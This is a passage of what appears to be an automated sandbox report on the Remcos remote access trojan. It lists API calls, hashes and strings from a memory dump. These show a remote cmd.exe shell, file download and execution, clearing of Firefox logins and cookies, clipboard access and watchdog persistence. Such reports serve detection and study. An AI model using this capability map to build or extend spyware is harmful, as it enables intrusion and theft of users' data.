                                                  • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000,004752F0), ref: 0041374F
                                                  • RegQueryValueExA.KERNELBASE(00000000,00000000,00000000,00000000,00000208,?), ref: 00413768
                                                  • RegCloseKey.KERNELBASE(00000000), ref: 00413773
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseOpenQueryValue
                                                  • String ID:
                                                  • API String ID: 3677997916-0
                                                  • Opcode ID: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                                  • Instruction ID: cdc8bb2f12cdea1da97e3e4d454c68039a4c25ad8704162e95ac064a0ac82555
                                                  • Opcode Fuzzy Hash: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                                  • Instruction Fuzzy Hash: C301AD7540022DFBDF215F91DC04DEB3F38EF05761F008065BE09620A1E7358AA5EB94
                                                  APIs
                                                  • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004135A4
                                                  • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,004752F0), ref: 004135C2
                                                  • RegCloseKey.KERNELBASE(?), ref: 004135CD
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseOpenQueryValue
                                                  • String ID:
                                                  • API String ID: 3677997916-0
                                                  • Opcode ID: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                                  • Instruction ID: 3ea041f737baa467864e73cd7e114674dd940ed34319bd14b5ec79364d8ab256
                                                  • Opcode Fuzzy Hash: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                                  • Instruction Fuzzy Hash: 39F01D76900218FFDF109FA09C45FEE7BBDEB04B11F1044A5BA04E6191D6359F549B94
                                                  APIs
                                                  • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?,00000000,?,?,0040C1D7,00466C58), ref: 00413551
                                                  • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,00000000,?,?,0040C1D7,00466C58), ref: 00413565
                                                  • RegCloseKey.KERNELBASE(?,?,?,0040C1D7,00466C58), ref: 00413570
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseOpenQueryValue
                                                  • String ID:
                                                  • API String ID: 3677997916-0
                                                  • Opcode ID: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                                  • Instruction ID: 960a54a16a1ccd4152458ec6927d20d37e2092670a33f2d7c306b576a706ad25
                                                  • Opcode Fuzzy Hash: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                                  • Instruction Fuzzy Hash: 23E06532801238FBDF204FA29C0DDEB7F6CDF06BA1B000155BD0CA1111D2258E50E6E4
                                                  APIs
                                                  • RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                  • RegSetValueExA.KERNELBASE(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
                                                  • RegCloseKey.ADVAPI32(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCreateValue
                                                  • String ID:
                                                  • API String ID: 1818849710-0
                                                  • Opcode ID: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                  • Instruction ID: 04d77b696783773a8a307df6842786532c8303179302b097fa31242bc3118ae5
                                                  • Opcode Fuzzy Hash: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                  • Instruction Fuzzy Hash: 1EE06D72500318FBDF109FA0DC06FEA7BACEF04B62F104565BF09A6191D6358E14E7A8
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _wcslen
                                                  • String ID: pQG
                                                  • API String ID: 176396367-3769108836
                                                  • Opcode ID: 2909f1be4624e20aefd95f70af1697863fb55ab0ff45cf84c0a49d4b96723009
                                                  • Instruction ID: e26466b944e621eef81fbe5db30e3e3b172770e45cde188e8c087a2518f8d89f
                                                  • Opcode Fuzzy Hash: 2909f1be4624e20aefd95f70af1697863fb55ab0ff45cf84c0a49d4b96723009
                                                  • Instruction Fuzzy Hash: 631181319002059BCB15EF66E852AEF7BB4AF54314B10413FF446A62E2EF78AD15CB98
                                                  APIs
                                                  • GlobalMemoryStatusEx.KERNELBASE(?), ref: 0041B85B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: GlobalMemoryStatus
                                                  • String ID: @
                                                  • API String ID: 1890195054-2766056989
                                                  • Opcode ID: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                                  • Instruction ID: 2d2b64c70bc766df394076410504e3f9c8f669937c614d63c6700d8895b1c70c
                                                  • Opcode Fuzzy Hash: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                                  • Instruction Fuzzy Hash: E6D017B58023189FC720DFA8E804A8DBBFCFB08210F00456AEC49E3700E770E8008B94
                                                  APIs
                                                  • socket.WS2_32(?,00000001,00000006), ref: 00404852
                                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E
                                                    • Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateEventStartupsocket
                                                  • String ID:
                                                  • API String ID: 1953588214-0
                                                  • Opcode ID: 1e452a305f2f2717745e8e1604374189d9659e6cad2ea1bb393ee33250cb33e3
                                                  • Instruction ID: ed99eca956a2b7a9b5891d615cc725ddac26720bb1770143763ad27df005c20f
                                                  • Opcode Fuzzy Hash: 1e452a305f2f2717745e8e1604374189d9659e6cad2ea1bb393ee33250cb33e3
                                                  • Instruction Fuzzy Hash: 760171B1408B809ED7359F38A8456877FE0AB55304F048D6EF1DA97B91D3B5A881CB18
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9ebd29a8193938baf2c5ce5f6ec3a3ea5040e3c3e83895a942c6279db0e0dd98
                                                  • Instruction ID: 1e9d0a06bdb6e9f7b23a96960dfc4b712b0be9606a3b942e14a6d4fe6a34620f
                                                  • Opcode Fuzzy Hash: 9ebd29a8193938baf2c5ce5f6ec3a3ea5040e3c3e83895a942c6279db0e0dd98
                                                  • Instruction Fuzzy Hash: EBF0E2706042016BCB0C8B34CD50B2A37954B84325F248F7FF02BD61E0C73EC8918A0D
                                                  APIs
                                                  • GetForegroundWindow.USER32 ref: 0041BB49
                                                  • GetWindowTextW.USER32(00000000,?,00000100), ref: 0041BB5C
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Window$ForegroundText
                                                  • String ID:
                                                  • API String ID: 29597999-0
                                                  • Opcode ID: 2784d0b2db336add8319ad638143428ee57387129fbd6e48793ce9af45086994
                                                  • Instruction ID: 8c7c0eb369f00208a7459315ff6bb8442305c4ed6b2016914032ba092e23deac
                                                  • Opcode Fuzzy Hash: 2784d0b2db336add8319ad638143428ee57387129fbd6e48793ce9af45086994
                                                  • Instruction Fuzzy Hash: 21E04875A00328A7E720A7A5AC4EFD5776C9708755F0001AEBA1CD61C2EDB4AD448BE5
                                                  APIs
                                                  • getaddrinfo.WS2_32(00000000,00000000,00000000,00472ADC,004750E4,00000000,004151C3,00000000,00000001), ref: 00414F46
                                                  • WSASetLastError.WS2_32(00000000), ref: 00414F4B
                                                    • Part of subcall function 00414DC1: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                                                    • Part of subcall function 00414DC1: LoadLibraryA.KERNEL32(?), ref: 00414E52
                                                    • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                                                    • Part of subcall function 00414DC1: FreeLibrary.KERNEL32(00000000), ref: 00414E79
                                                    • Part of subcall function 00414DC1: LoadLibraryA.KERNEL32(?), ref: 00414EB1
                                                    • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                                                    • Part of subcall function 00414DC1: FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                                                    • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                                  • String ID:
                                                  • API String ID: 1170566393-0
                                                  • Opcode ID: 63e6a57adcb3e9d376df8b1f7a36805de8af56205c6b0d3f673684859221182d
                                                  • Instruction ID: 64a5677b7ab27dcaa32d5743096e05a6e92bfc5102e3e8065abb212a99eff034
                                                  • Opcode Fuzzy Hash: 63e6a57adcb3e9d376df8b1f7a36805de8af56205c6b0d3f673684859221182d
                                                  • Instruction Fuzzy Hash: 23D017322005316BD320A769AC00AEBAA9EDFD6760B12003BBD08D2251DA949C8286E8
                                                  APIs
                                                    • Part of subcall function 00445B74: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0044834A,00000001,00000364,?,00000000,00000000,0043BCD6,00000000,00000000,?,0043BD5A,00000000), ref: 00445BB5
                                                  • _free.LIBCMT ref: 004501C0
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateHeap_free
                                                  • String ID:
                                                  • API String ID: 614378929-0
                                                  • Opcode ID: 60f99f4f74d771fb4a1326b0b926bb5a841854500e0a6ddc8464f8a9dc27050b
                                                  • Instruction ID: 1bf88885f7a62dfe3e195aa205353632c6f85cb380d5d404dcdd82bf2c99678c
                                                  • Opcode Fuzzy Hash: 60f99f4f74d771fb4a1326b0b926bb5a841854500e0a6ddc8464f8a9dc27050b
                                                  • Instruction Fuzzy Hash: DB014976200744ABE731CF6ACC42D5AFBD8EB85370F25062EE58483281EB34A909C779
                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0044834A,00000001,00000364,?,00000000,00000000,0043BCD6,00000000,00000000,?,0043BD5A,00000000), ref: 00445BB5
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1279760036-0
                                                  • Opcode ID: ce26be8ca3846e5000c6f53c40b97d329a66d538f9906bf99632d42dae41b906
                                                  • Instruction ID: ef76d3429b2572ee2e16b707a9c356192af24cfd4e901c13b73aaad13af6506a
                                                  • Opcode Fuzzy Hash: ce26be8ca3846e5000c6f53c40b97d329a66d538f9906bf99632d42dae41b906
                                                  • Instruction Fuzzy Hash: BEF0B431500F65ABBF222E22AC05E5B3769DB81770B14412BB914EA286CA38FC0186AC
                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1279760036-0
                                                  • Opcode ID: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                                  • Instruction ID: 139fbca062bb8bf671a891d82c3cf8fc988f9ce198a1a8b78c24da0334343556
                                                  • Opcode Fuzzy Hash: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                                  • Instruction Fuzzy Hash: CEE0E531A0021267F6312A269C01B5B76599B437A0F170137AD15922D2CE6CCD0181EF
                                                  APIs
                                                  • WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Startup
                                                  • String ID:
                                                  • API String ID: 724789610-0
                                                  • Opcode ID: e47b679f8b5f7a60eca2a032b66c8256c268ab46ab34190103e4171c6a1e128b
                                                  • Instruction ID: 97c3e6bab4f4407137ad71e204409d8be70fba83985c90e8682379c152a4c00d
                                                  • Opcode Fuzzy Hash: e47b679f8b5f7a60eca2a032b66c8256c268ab46ab34190103e4171c6a1e128b
                                                  • Instruction Fuzzy Hash: 92D0123255C70C8EE620ABB4AD0F8A4775CC317616F0007BA6CB5836D3E6405B1DC2AB
                                                  APIs
                                                  • SetEvent.KERNEL32(?,?), ref: 00407CF4
                                                  • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407DC2
                                                  • DeleteFileW.KERNEL32(00000000), ref: 00407DE4
                                                    • Part of subcall function 0041C322: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C37D
                                                    • Part of subcall function 0041C322: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3AD
                                                    • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C402
                                                    • Part of subcall function 0041C322: FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C463
                                                    • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C46A
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                    • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                    • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004081D2
                                                  • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004082B3
                                                  • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084FF
                                                  • DeleteFileA.KERNEL32(?), ref: 0040868D
                                                    • Part of subcall function 00408847: __EH_prolog.LIBCMT ref: 0040884C
                                                    • Part of subcall function 00408847: FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                                    • Part of subcall function 00408847: __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                                    • Part of subcall function 00408847: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                                  • Sleep.KERNEL32(000007D0), ref: 00408733
                                                  • StrToIntA.SHLWAPI(00000000,00000000), ref: 00408775
                                                    • Part of subcall function 0041CA73: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                                  • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                                                  • API String ID: 1067849700-181434739
                                                  • Opcode ID: e31fc5d342a806c1dc9b18746002928eb554072929475d0cc0e794d3765f9d05
                                                  • Instruction ID: f533dcafa702064eae222fc9ff54aa9327b172b3479e3db69e1c842a3252ef64
                                                  • Opcode Fuzzy Hash: e31fc5d342a806c1dc9b18746002928eb554072929475d0cc0e794d3765f9d05
                                                  • Instruction Fuzzy Hash: F04293716043016BC604FB76C9579AE77A9AF91348F80483FF542671E2EF7C9908879B
                                                  APIs
                                                  • __Init_thread_footer.LIBCMT ref: 004056E6
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                  • __Init_thread_footer.LIBCMT ref: 00405723
                                                  • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660CC,00000000), ref: 004057B6
                                                  • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                                                  • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                                  • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
                                                  • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                                    • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                  • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90,004660D0,00000062,004660B4), ref: 004059E4
                                                  • Sleep.KERNEL32(00000064,00000062,004660B4), ref: 004059FE
                                                  • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                                  • CloseHandle.KERNEL32 ref: 00405A23
                                                  • CloseHandle.KERNEL32 ref: 00405A2B
                                                  • CloseHandle.KERNEL32 ref: 00405A3D
                                                  • CloseHandle.KERNEL32 ref: 00405A45
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                  • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                                                  • API String ID: 2994406822-18413064
                                                  • Opcode ID: 9a357357cc3eaf70c54d44b7eab641d6e52edcb065c3fb3549e058ba593dddbf
                                                  • Instruction ID: feb7c3e087fbbfe745e3798ef664df189eb35a760580a6c3fca7c2e5343dee52
                                                  • Opcode Fuzzy Hash: 9a357357cc3eaf70c54d44b7eab641d6e52edcb065c3fb3549e058ba593dddbf
                                                  • Instruction Fuzzy Hash: 1A91C271604604AFD711FB36ED42A6B369AEB84308F01443FF589A62E2DB7D9C448F6D
                                                  APIs
                                                  • GetCurrentProcessId.KERNEL32 ref: 00412141
                                                    • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                    • Part of subcall function 004138B2: RegSetValueExA.KERNELBASE(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
                                                    • Part of subcall function 004138B2: RegCloseKey.ADVAPI32(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
                                                  • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00412181
                                                  • CloseHandle.KERNEL32(00000000), ref: 00412190
                                                  • CreateThread.KERNEL32(00000000,00000000,00412829,00000000,00000000,00000000), ref: 004121E6
                                                  • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00412455
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                                  • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                                  • API String ID: 3018269243-13974260
                                                  • Opcode ID: 25a218a9745e8634b3b83e52e355b5d10bdf16a4bcfc3846cacb01f512ecf1d5
                                                  • Instruction ID: f1b014459f2de55ad39b9ce4e2eab06dd530905b6b6ad57ecd0cf2e75cce6712
                                                  • Opcode Fuzzy Hash: 25a218a9745e8634b3b83e52e355b5d10bdf16a4bcfc3846cacb01f512ecf1d5
                                                  • Instruction Fuzzy Hash: B971A23160430167C614FB72CD579AE77A4AE94308F40097FF586A21E2FFBC9A49C69E
                                                  APIs
                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBEA
                                                  • FindClose.KERNEL32(00000000), ref: 0040BC04
                                                  • FindNextFileA.KERNEL32(00000000,?), ref: 0040BD27
                                                  • FindClose.KERNEL32(00000000), ref: 0040BD4D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$CloseFile$FirstNext
                                                  • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                  • API String ID: 1164774033-3681987949
                                                  • Opcode ID: 1dd2d77424a1feb7b81cbbfb01062b06d0993b8648acb28e4275aca406a32408
                                                  • Instruction ID: 8b0b2ff803da1d4b435a108118727fe7c74031c8ac088da8990f7d135a86af9b
                                                  • Opcode Fuzzy Hash: 1dd2d77424a1feb7b81cbbfb01062b06d0993b8648acb28e4275aca406a32408
                                                  • Instruction Fuzzy Hash: C7514F3190021A9ADB14FBB2DC56AEEB739AF10304F50057FF506721E2FF785A49CA99
                                                  APIs
                                                  • OpenClipboard.USER32 ref: 004168FD
                                                  • EmptyClipboard.USER32 ref: 0041690B
                                                  • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 0041692B
                                                  • GlobalLock.KERNEL32(00000000), ref: 00416934
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0041696A
                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00416973
                                                  • CloseClipboard.USER32 ref: 00416990
                                                  • OpenClipboard.USER32 ref: 00416997
                                                  • GetClipboardData.USER32(0000000D), ref: 004169A7
                                                  • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                                  • CloseClipboard.USER32 ref: 004169BF
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                  • String ID: !D@
                                                  • API String ID: 3520204547-604454484
                                                  • Opcode ID: 056581877102e7e082da21667afdb56216d3234cc4f44d7eb92223297b973a24
                                                  • Instruction ID: 548dc4d81477911aad8e8b192ef25fd2d65b79b2884d290c2f7190e4363fe536
                                                  • Opcode Fuzzy Hash: 056581877102e7e082da21667afdb56216d3234cc4f44d7eb92223297b973a24
                                                  • Instruction Fuzzy Hash: 23215171204301EBD714BB71DC5DAAE7AA9AF88746F00043EF946961E2EF3C8C45866A
                                                  APIs
                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDEA
                                                  • FindClose.KERNEL32(00000000), ref: 0040BE04
                                                  • FindNextFileA.KERNEL32(00000000,?), ref: 0040BEC4
                                                  • FindClose.KERNEL32(00000000), ref: 0040BEEA
                                                  • FindClose.KERNEL32(00000000), ref: 0040BF0B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$Close$File$FirstNext
                                                  • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                  • API String ID: 3527384056-432212279
                                                  • Opcode ID: 0e02877a0a7a0854a613cb848fbdcbf87c912738fbad3b4f45ae5d99c19712fd
                                                  • Instruction ID: 490896facf616f27299b965c2ba25c256be2621490ca3b25f990f1d956524bcc
                                                  • Opcode Fuzzy Hash: 0e02877a0a7a0854a613cb848fbdcbf87c912738fbad3b4f45ae5d99c19712fd
                                                  • Instruction Fuzzy Hash: E0417F3190021AAACB04F7B2DC5A9EE7769AF11704F50057FF506B21E2EF385A458A9D
                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F4C9
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00475338), ref: 0040F4F4
                                                  • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F510
                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F58F
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00475338), ref: 0040F59E
                                                    • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                    • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                  • CloseHandle.KERNEL32(00000000,?,00475338), ref: 0040F6A9
                                                  Strings
